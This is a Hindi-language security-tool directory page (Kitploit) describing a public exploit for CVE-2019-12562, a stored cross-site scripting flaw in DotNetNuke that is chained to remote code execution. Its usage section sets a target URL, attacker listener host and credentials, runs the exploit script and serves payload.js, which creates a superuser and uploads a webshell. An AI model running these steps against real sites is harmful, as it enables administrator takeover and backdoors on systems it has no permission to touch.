Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-12562 — DotNetNuke (DNN) 9.4.0 से पहले के संस्करण में संग्रहीत क्रॉस-साइट स्क्रिप्टिंग | XSS से RCE | Kitploit
उपकरण/GitHubGitHub/mayaseven/cve-2019-12562
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubmayaseven/cve-2019-12562

CVE-2019-12562

DotNetNuke (DNN) 9.4.0 से पहले के संस्करण में संग्रहीत क्रॉस-साइट स्क्रिप्टिंग | XSS से RCE

रिपॉजिटरी देखें
8416 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2019-12562

CVE-2019-12562

DotNetNuke (DNN) के 9.4.0 से पहले के संस्करण में संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (Stored Cross-Site Scripting) दूरस्थ हमलावरों को दुर्भावनापूर्ण स्क्रिप्ट को एडमिन नोटिफिकेशन पेज में संग्रहीत करने और एम्बेड करने की अनुमति देती है। इस एक्सप्लॉइट का उपयोग व्यवस्थापक विशेषाधिकारों के साथ कोई भी कार्य करने के लिए किया जा सकता है, जैसे सामग्री प्रबंधित करना, उपयोगकर्ताओं को जोड़ना, सर्वर पर बैकडोर अपलोड करना, आदि। सफल शोषण तब होता है जब कोई एडमिन उपयोगकर्ता संग्रहीत क्रॉस-साइट स्क्रिप्टिंग वाले नोटिफिकेशन पेज पर जाता है।

शोषण

  • एक्सप्लॉइट फ़ाइल कॉन्फ़िगर करें
root@kitploit:~
TARGET_URL = "http://targetdomain/DotNetNuke"
USERNAME = "MAYASEVEN"   # At least five characters long
PASSWORD = "P@ssw0rd" # At least 0 non-alphanumeric characters, At least 7 characters
EMAIL = "[email protected]" # Change email to any you want
# A web server for listening an event
LISTEN_URL = "http://yourdomain.com:1337"
  • यदि लक्ष्य असुरक्षित है तो एक्सप्लॉइट चलाएँ, यह "Display Name" फ़ील्ड में XSS संलग्न करके एक डमी उपयोगकर्ता पंजीकृत करेगा और आपको payload.js प्राप्त होगा।
root@kitploit:~
python3 CVE-2019-12562.py
  • आपको वेबसर्वर को सर्व करना होगा और एडमिन कनेक्शन की प्रतीक्षा के लिए उस पर payload.js रखना होगा।
root@kitploit:~
python -m SimpleHTTPServer 1337

यह एक्सप्लॉइट एक सुपरयूज़र बनाएगा और लक्ष्य सर्वर पर एक वेबशेल अपलोड करेगा

एक्सप्लॉइट शर्त: सफल शोषण तब होता है जब कोई एडमिन उपयोगकर्ता नोटिफिकेशन पेज पर जाता है।

और पढ़ें: https://mayaseven.com/cve-2019-12562-stored-cross-site-scripting-in-dotnetnuke-dnn-version-v9-3-2/ CVE संदर्भ: https://www.cvedetails.com/cve/CVE-2019-12562/

टूल डाउनलोड करें